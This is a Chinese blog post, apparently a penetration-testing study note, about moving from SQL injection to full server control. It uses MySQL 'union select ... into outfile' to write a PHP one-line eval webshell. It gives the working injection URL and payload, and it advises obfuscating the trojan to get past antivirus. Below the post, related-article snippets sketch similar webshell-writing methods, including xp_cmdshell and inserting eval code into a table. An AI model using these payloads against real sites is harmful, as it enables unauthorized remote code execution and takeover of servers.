利用SQL注入上传木马拿webshell

最新推荐文章于 2024-07-12 14:10:37 发布
最新推荐文章于 2024-07-12 14:10:37 发布
阅读量1.8k 收藏 5
点赞数
分类专栏: SQL注入 文章标签: sql 木马 注入 webshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46230316/article/details/106337763
版权

做ctf题目的时候,一般都是在数据库中找到flag,但是在渗透中,最终的目标是拿下服务器
正常情况下,为了管理方便,许多管理员都会开放MySQL数据库的secure_file_priv,这时就可以导入或者导出数据
当我如图输入时,就会在D盘创建一个名为123456.php,内容为<?php phpinfo();?>的文件
在这里插入图片描述
在这里插入图片描述
我们可以利用这一点运用到SQL注入中,从拿下数据库到拿下目标的服务器
在这里插入图片描述
比如我们在使用联合查询注入,正常是这样的语句http://xxx?id=-1 union select 1,'你想知道的字段的内容或查询语句',3,4,5,6 from (database_name.)table_name,我们就把要查询的内容换成'<?php @eval($_POST[shell]);?>',把后面的库和表名换成into outfile 'd:/shell.php'

http://xxx?id=-1 union select 1,'<?php @eval($_POST[shell]);?>',3,4,5,6 into outfile 'd:/shell.php'

这里的木马肯定要经过加密过狗,否则会直接被杀
如果查询长度有限制的话,这种方法成功的可能性不大

mon0dy
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入与ASP木马上传的又一思路.txt
07-06
·中华隐者
php木马webshell扫描器代码
12-18
- 考虑对其他可能的恶意行为进行检测,如SQL注入、跨站脚本攻击等。 总之,这个PHP木马WebShell扫描器代码提供了一个基础的框架,可以用来检测服务器上可能存在的恶意PHP文件。然而,为了达到最佳的防护效果,还...
SQL注入与ASP木马上传
12-31 924
SQL注入后,如何上传木马,一直是比较头疼的事,我这里提供上传木马的一种另一种方法。1、SQL注入的时候,用xp_cmdshell 向服务器上写入一个能写文件的asp文件。文件内容:Set objFSO = Server.CreateObject("scripting.FileSystemObject")Set objCountFile=objFSO.CreateTextFile(request(
实战演练:从SQL注入WebShell获取
最新发布
weixin_43822401的博客
07-12 502
SQL注入漏洞是Web应用程序面临的主要安全威胁之一。本文通过一个实战案例,详细演示了从识别SQL注入漏洞到获取WebShell的完整攻击链,旨在提高网络安全专业人士的防御能力。
SQL注入上传一句话木马(转)
hanzhen668的博客
06-10 1512
SQL注入上传一句话木马
SQL注入(4)——实战SQL注入webshell
realmels的博客
05-27 1226
本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记 前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用 目录扫描,请求重发,漏洞扫描等工具的使用 网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP 通过一个实例来进行SQL注入的实战。 ...
SQL注入-概述-ppt.pptx
10-27
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)进行数据存储和检索的Web应用程序。这种攻击方式利用了程序设计中的漏洞,使得恶意用户能够通过输入特定的SQL代码,来操纵数据库,获取未经授权...
良精南方网站系统拿webshell的教程
03-06
例如,SQL注入可能导致数据库数据泄露,而文件上传漏洞则可以直接让攻击者上传恶意脚本。 在这个教程中,关键步骤是找到允许上传文件的入口,并且利用这个入口上传包含恶意代码的文件。Webshell通常是一段能够执行...
基于B_S系统的SQL注入防御技术研究.pdf
09-19
一旦获得了网站的控制权,攻击者能够上传网页木马、控制整站等进行违法操作,因此WebShell攻击的防御同样重要。 文章还指出,由于攻击者可能利用各种手段隐藏攻击意图,SQL注入攻击的防御不仅仅是技术问题,还需要...
SQL注入攻击——信息安全
08-20
7. 上传木马:在获取后台权限后,上传木马文件,以获取持久的Webshell控制权。 SQL盲注是SQL注入的一种变体,攻击者在无错误信息或固定响应的情况下进行攻击,需要通过真假问题和延迟注入等技术来推测数据库信息。 ...
SQL注入上传一句话木马
buffedon的博客
05-31 9539
利用sql注入上传一句话木马导读1. sql注入的危害2. 文件写入2.1 webshell和一句话木马webshell(大马)一句话木马木马文件的危害2.2 文件写入的前提条件2.3 写入函数2.4 怎么找网站根目录(绝对路径)2.5 只能与回显注入结合2.6 日志写文件2.7 文件读取前提条件读取函数2.8 针对文件写入的防护 导读 本文主要介绍了利用sql漏洞上传文件的一些知识。在利用sql注入漏洞上传文件的时候我们需要知道 被上传的网页 在web服务器的路径 上传文件要获取哪些权限,也就是有哪些前
SQL注入得到WEBSHELL
11-15 1026
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
SQL注入木马上传
zgqtxwd的专栏
04-26 1156
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
如何通过SQL语句写入webshell
09-16 611
web应用场景下,经常会碰到SQL注入场景,如页面能够执行SQL语句,那么可能会有直接通过SQL语句写入webshell的风险,常见的phpmyadmin环境下,通过几个语句可以轻松将一句话木马写入到服务器文件,如下: use test; //进入数据库create table test (shell text not null); //创建表insert into test (shell) values('<?php eval($_POST[a])?>'); //插入表单数据s...
SQL注入之——Mysql+PHP手工获取webshell
温柔小薛的博客
04-04 1653
Mysql+PHP手工获取webshell 目录Mysql+PHP手工获取webshell一、使用 order by 查询字段二、使用联合查询来查询当前数据库、用户、版本信息等三、获取表名、字段、值四、Mysql root 用户密码存储位置五、对服务器文件进行读写操作六、怎么获取 Web 路径七、利用 sql 注入写入 webshell八、MysQL 获取 web 路径方法总结 只是大概流程,等梳...
另类sql注入webshell
chongsi9495的博客
04-17 198
sql注入,想必大家都知道,本文教大家如果通过常规方法不行的前提下,拿下网站shell。 凡是以http://www.xxx.com/xxx.asp?id=1类似名称都可以通过著名的and 1=1 和and 1=2来检测是否存在漏洞。 当时我拿的一个网站(为了安全考虑,此时不举出该网站的名...
SQL注入——文件上传
heyingcheng的博客
03-11 2407
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
渗透测试技术:从SQL注入到内网渗透
SQL注入的危害不仅限于信息泄露,还可以用于修改网页信息,上传webshell以提升权限,甚至控制整个服务器。由于这些操作通常表现为合法的Web访问,传统防火墙往往难以识别和阻止。因此,对输入数据的严格过滤和验证是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值